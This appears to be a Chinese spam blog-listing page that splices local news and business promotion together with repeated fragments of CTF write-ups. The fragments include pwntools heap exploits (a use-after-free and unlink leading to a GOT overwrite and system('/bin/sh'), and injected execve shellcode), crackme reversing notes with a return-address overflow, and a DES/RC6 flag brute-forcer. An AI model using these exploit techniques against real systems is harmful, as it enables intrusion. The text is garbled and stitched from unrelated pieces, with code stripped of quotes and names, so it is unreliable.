更多>>精华博文推荐
更多>>人气最旺专家

宋青青

领域:中华网

介绍:此外在峰会现场谢君还介绍一个不需要通过软件漏洞就能Root无人机的方法,并演示了如何远程劫持一台无人机。目前,香港华润、台湾水泥集团、印尼爱凯尔集团、中国华电、北京华联、南宁梦之岛、南宁百货、苏宁电器等一大批国内外知名企业都看好贵港的发展前景,纷纷抢占贵港的发展先机,在贵港投资兴办实业,都获得了丰厚的回报。,。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。...

中川亚纪子

领域:中国网

介绍:通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528通过合并这些阶段,我们实际上得到了V8使用的并行Scavenger,它与Halstead的半空间收集器类似,不同之处在于V8使用动态工作和一个简单的负载平衡机制来扫描根(见图4)。分析发现这是RSA算法,提供了N和D,输入e和p进行匹配。,一些未文档化的结构在不同Windows版本间有所变化。...

www.866801.com
hhz | 2018-7-18 | 阅读(73) | 评论(221)
ACE(也称为TritonACE)提供无签名分析来识别恶意的意图,其中包括使用规避技巧来掩盖恶意软件。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit(),OD打开程序发现OEP是0,程序被加壳或修改过。OD打开程序发现OEP是0,程序被加壳或修改过。...【阅读全文】
xh3 | 2018-7-18 | 阅读(570) | 评论(577)
最近两年越来越多的安全人员开始投入到IoT设备的研究热中,常见的研究方向包括路由器、摄像头、汽车等。”在村头果园里,合作社理事会成员冯杰给记者算了收入账:每亩产枣6000多斤,按照4元一斤的市场价,一亩产值就有2万多元。,(唐正芳)+1贵港市平南籍选手、河南师范大学体育学院2016级运动训练专业学生彭昭杰代表中国队参加男女混合团体赛,最终力克强敌获得世界冠军。...【阅读全文】
n3x | 2018-7-18 | 阅读(384) | 评论(749)
总之,当前此方案在接听、放音上没问题,但录音有问题。在之前的博文中,我们已经谈到了如何减少垃圾回收的暂停时间和内存消耗。,我知道,但那已经是10年前的事了。利用思路利用cheat在chunk中放置shellcode,修改got指向chunk中的shellcode相关结构体structx_acc{__int64field_0;charusername[16];charpassword[16];x_character*character;};structx_character{charname[16];__int64health;__int64stamina;__int64weight;__int64location;x_item*item_head;};structx_cheat_st{charname[16];charcontent[32];};structx_chunk{__int64ref_count;__int64size;chardata[1];};structx_item{__int64id;__int64weight;__int64count;x_item*next;__int64bullet;__int64power;};脚本###=Truefrompwnimport*importsysimporttimeimportrecontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./pwn7)ifargs[LOCAL]:io=process(./pwn7)else:io=remote(,8888)sc="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"defcmd_signup(username,password,character_name):(Signup==============================)(2)(inputyourusername)(username)(inputyourpassword)(password)(inputyourcharacter\sname)(character_name)()returndefcmd_login(username,password):(Signup==============================)(1)(Inputyourusername:)(username)(Inputyourpassword:)(password)returndefcmd_exit():()(0)returndefcmd_show():()(1)(===============================)(==============================)returndefcmd_item_enter():()(2)returndefcmd_item_leave():(YourChoice:)(str(-1))(wrongchoice)returndefcmd_item_view(id):(YourChoice:)(str(id))data=()(2)returndatadefcmd_item_delete(id):(YourChoice:)(str(id))()(1)data=()(2)returndatadefcmd_goto(location):()(3)()(str(location))returndefcmd_explore(l):()(4)(Youfind:)s=(2)ifs==no:(found)returns+=(0)(Doyouwanttopickupit)ifsinl:(y)else:(n)s=returnsdefcmd_explore_until_success(l):while1:item_name=cmd_explore(l)print(pickup:%s%item_name)ifnot(item_name==):(item_name)(1)returndefcmd_cheat(first,name,content):()(5)iffirst==1:(name:)(name)(content:)(content)else:(content:)(content)returndefexploit():username=a*8password=b*8character_name=c*8cmd_signup(username,password,character_name)cmd_login(username,password)#cmd_show()cmd_goto(1)cmd_cheat(1,x*8,y*0x18)#pickup2differentitemsl=[98k,S12K,AKM,M16A4,UMP45,SKS,M416,M24,Bandage,Drink,FirstAidKit]cmd_explore_until_success(l)cmd_explore_until_success(l)#deleteoneitem(initfreelist)cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#(io)#input()#putfakepointerinitem2buf=buf+=z*0x40#item1(freed)#item2headerbuf+=p64(1)#ref_countbuf+=p64(0x18)#size#item2buf+=p64([memcmp])#id(fakepointer)buf+=p64(0)#weightbuf+=p64(1)#countbuf+=p64(0)#nextbuf+=p64(0)#bulletbuf+=p64(0)#power#freelistbuf+=p64(0)#ref_countbuf+=p64(0x20)#sizebuf+=p64(0)buf+=p64(0)cmd_cheat(0,x*8,y*0x20+buf)#overwritetargetwithfreelist+0x10cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#copyshellcodetofreelist+0x10buf=buf+=z*0xA0buf+=sccmd_cheat(0,x*8,y*0x20+buf)cmd_exit()#triggermemcmp(callshellcode)cmd_login(username,password)()returnexploit()flag{Cr4k4ndH4ckF0rFunG00dLuck2o17}...【阅读全文】
z3j | 2018-7-18 | 阅读(710) | 评论(607)
在上面的代码中,获取函数地址的部分没有具体写,上一篇帖子中详细的说明了获取的过程,差别就是上一篇帖子中需要将RVA转化为文件偏移。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit(),但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。前8个字符正好是des块长度,也就是说,我们知道了rc6的部分明文和密文,可以通过rc6解密穷举出rc6后4位key和全部rc6的明文。...【阅读全文】
dzv | 2018-7-18 | 阅读(501) | 评论(283)
综上,从行为和代码分析来看,没有隐藏后门。它跟从六月开始发起攻击()的Petya(AKANotPetya,GoldenEye,ExPetr,Petrwrap)很像:勒索信息在内容和风格上很相似;它们要求的赎金量也差不多(六月是300美元对应现价值280美元的比特币);而且它也是一旦侵入网络,就尝试横向传播(注:转移至附近结点)。,:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A为邀请更多企业来贵港“安新家”,当地开展“大招商、招大商”行动,仅2017年就组织各类招商活动1700多场次。...【阅读全文】
pjp | 2018-1-17 | 阅读(82) | 评论(986)
平行Mark-Evacuate收集器的缺点是执行三个独立锁步阶段时的开销。一些未文档化的结构在不同Windows版本间有所变化。,处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。...【阅读全文】
5rv | 2018-1-17 | 阅读(586) | 评论(679)
业主由原来委托多个中介才能完成的项目,变成只委托一家就可以完成,减少了多次跑路,压缩了时间,降低了成本,各类投资项目中介服务时限大幅压缩。Rva2OffsetF5后的代码这张图中,具有特征性的应该就是这些数字了,如果根据之前的想法,怀疑这是个反射式DLL注射,进入到这个函数的时候,可以去思考这是不是在解析PE文件。,而在基地,像大菱这样签约进驻的企业还有70多家,涵盖配件生产、整车组装等,生产的电动车销往泰国等地。但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。...【阅读全文】
lhl | 2018-1-17 | 阅读(223) | 评论(544)
  随着新型经营主体多点开花,平南县的农产品供应与加工业也不断升级,产业链条越拉越长。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91},而且大多数浏览器会通过抛出错误来应对,询问是否要终止网页。(二)着力打造具有地域特色荷文化把发掘、传承、弘扬、光大荷文化底蕴作为示范区建设发展主线,不断推进荷文化建设,让传统荷文化保持旺盛的生命力。...【阅读全文】
brr | 2018-1-17 | 阅读(572) | 评论(753)
有3处"sizeof(BloomWord)"的使用应为"sizeof(BloomWord)*8",因为我们处理的是位,而不是字节。优点:没有使用获取LoadLibraryA函数。,:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A这可能会很容易的发生,特别是使用递归的情况下。...【阅读全文】
nhx | 2018-1-16 | 阅读(647) | 评论(491)
但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。之后分析的进程注入技术都开源到这一个项目上。,那当然是让他直接登陆啦!这是我一开始的想法,不过我对smali语法不熟,没有找到关键点。清扫者认为调用堆栈中的引用以及从旧到新的引用是根。...【阅读全文】
tpn | 2018-1-16 | 阅读(620) | 评论(980)
处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMO